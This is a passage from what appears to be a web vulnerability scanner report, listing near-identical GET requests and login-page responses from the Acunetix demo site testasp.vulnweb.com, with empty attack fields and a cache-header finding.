</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
